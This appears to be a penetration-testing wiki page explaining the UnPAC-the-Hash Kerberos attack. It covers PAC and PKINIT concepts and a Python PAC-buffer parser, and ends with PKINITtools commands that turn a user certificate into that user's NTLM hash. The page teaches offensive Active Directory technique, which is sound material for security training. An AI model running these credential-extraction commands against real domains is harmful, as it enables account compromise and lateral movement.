# UnPAC The Hash

The UnPAC The Hash attack relies on two things that I first have to define: the PAC and PKINIT.

* In the Kerberos Authentication protocol, a user's Kerberos tickets can contain a **Privilege Attribute Certificate (PAC)** that describes the user's security groups and privileges.
* **Public Key Cryptography for Initial Authentication in Kerberos (PKINIT)** is an extension in Kerberos Authentication that allows for certificate-based authentication.

{% hint style="info" %}
The PAC can also contain the NTLM hashes of the authenticating user, allowing a client to fall back to NTLM authentication when the target server doesn't support Kerberos.
{% endhint %}

When a client obtains a Ticket Granting Ticket (TGT) through PKINIT, the Key Distribution Center (KDC) returns a session key together with a PAC that includes the NTLM password hash of the authenticating user.

Using that TGT in a U2U S4U2Self request yields a Kerberos Service Ticket (ST) whose PAC can be decrypted with the session key obtained earlier.

Once the PAC is decrypted, we can extract the NTLM hash.
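To make the PAC layout concrete, here is an added example (not code from this page or from PKINITtools) that walks the PACTYPE header of a PAC blob, lists its buffers, and reports whether a PAC_CREDENTIAL_INFO buffer is present and which Kerberos encryption type protects its payload. The sample PAC bytes are constructed, and the function names are assumptions of this example.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# MS-PAC buffer types; type 2 (PAC_CREDENTIAL_INFO) is the buffer a PKINIT-issued
# ticket carries and is what UnPAC-the-Hash decrypts with the AS reply key.
PAC_BUFFER_TYPES = {1: "PAC_LOGON_INFO", 2: "PAC_CREDENTIAL_INFO", 6: "SERVER_CHECKSUM",
                    7: "KDC_CHECKSUM", 10: "PAC_CLIENT_INFO", 12: "UPN_DNS_INFO"}
KRB_ETYPE = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

@dataclass
class PacBuffer:
    ul_type: int
    data: bytes

def parse_pactype(blob: bytes) -> List[PacBuffer]:
    """Parse the PACTYPE header (cBuffers, Version, PAC_INFO_BUFFER[]) and slice out each payload."""
    if len(blob) < 8:
        raise ValueError("PACTYPE header truncated")
    c_buffers, version = struct.unpack_from("<II", blob, 0)
    if version != 0:
        raise ValueError(f"unexpected PACTYPE version {version}")
    buffers = []
    for i in range(c_buffers):
        # PAC_INFO_BUFFER: ulType (4 bytes), cbBufferSize (4), Offset (8), little-endian
        ul_type, size, offset = struct.unpack_from("<IIQ", blob, 8 + 16 * i)
        if offset + size > len(blob):
            raise ValueError(f"buffer {i} (type {ul_type}) runs past the end of the PAC")
        buffers.append(PacBuffer(ul_type, blob[offset:offset + size]))
    return buffers

def credential_info_etype(buffers: List[PacBuffer]) -> Optional[int]:
    """Return the EncryptionType of PAC_CREDENTIAL_INFO, or None if the PAC has no such buffer.
    The SerializedData after the 8-byte header is encrypted with the AS reply key, so only the
    PKINIT client (or whoever holds that key) can recover the NTLM hash inside."""
    for b in buffers:
        if b.ul_type == 2:
            if len(b.data) < 8:
                raise ValueError("PAC_CREDENTIAL_INFO truncated")
            cred_version, etype = struct.unpack_from("<II", b.data, 0)
            if cred_version != 0:
                raise ValueError(f"unexpected PAC_CREDENTIAL_INFO version {cred_version}")
            return etype
    return None

def build_sample_pac() -> bytes:
    """Constructed sample (not a real ticket): three buffers, the second a credential-info stub."""
    payloads = [(10, b"\x00" * 8), (2, struct.pack("<II", 0, 18) + b"\xAA" * 16), (6, b"\x00" * 4)]
    header = struct.pack("<II", len(payloads), 0)
    first_offset, body = 8 + 16 * len(payloads), b""
    for ul_type, data in payloads:
        header += struct.pack("<IIQ", ul_type, len(data), first_offset + len(body))
        body += data
    return header + body
```

Running the parser over a PAC decrypted from a real PKINIT-issued ticket shows whether credential info is present at all, which is useful when assessing how much a stolen certificate exposes.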

<figure><img src="https://3234535347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FkU93ONAZiHsNgO6Mhocr%2Fuploads%2FXZuGS8WgmB2RnAgulIbw%2Funpac.jpg?alt=media&#x26;token=fb5568a4-67fc-4f9d-91dd-2bbdd0834df7" alt=""><figcaption><p><a href="https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash">https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash</a></p></figcaption></figure>

## Exploit

#### Scenario

We have access to a certificate that is valid for client authentication as the domain user `ducky`.

The goal is to obtain the NTLM password hash for `ducky`: authenticate with the certificate through PKINIT to obtain a Kerberos ticket, then recover the NTLM hash from that ticket.

{% tabs %}
{% tab title="PKINITtools" %}
{% embed url="https://github.com/dirkjanm/PKINITtools" %}

{% code title="Linux (Attacker)" %}

```fish
## Authenticate with the certificate via PKINIT; the TGT is written to the ccache file ducky.ccache
## and the AS-REP encryption key is printed, which the last step needs
gettgtpkinit.py -cert-pfx ducky.pfx '[domain]/ducky' ducky.ccache

## Point the Kerberos credential cache environment variable at the new ccache
export KRB5CCNAME=/path/to/ducky.ccache

## Request a U2U S4U2Self ticket and recover the NT hash from its PAC
getnthash.py -key [encryption key printed by gettgtpkinit.py] '[domain]/ducky'
```

{% endcode %}
{% endtab %}

{% tab title="Rubeus" %}

{% endtab %}
{% endtabs %}
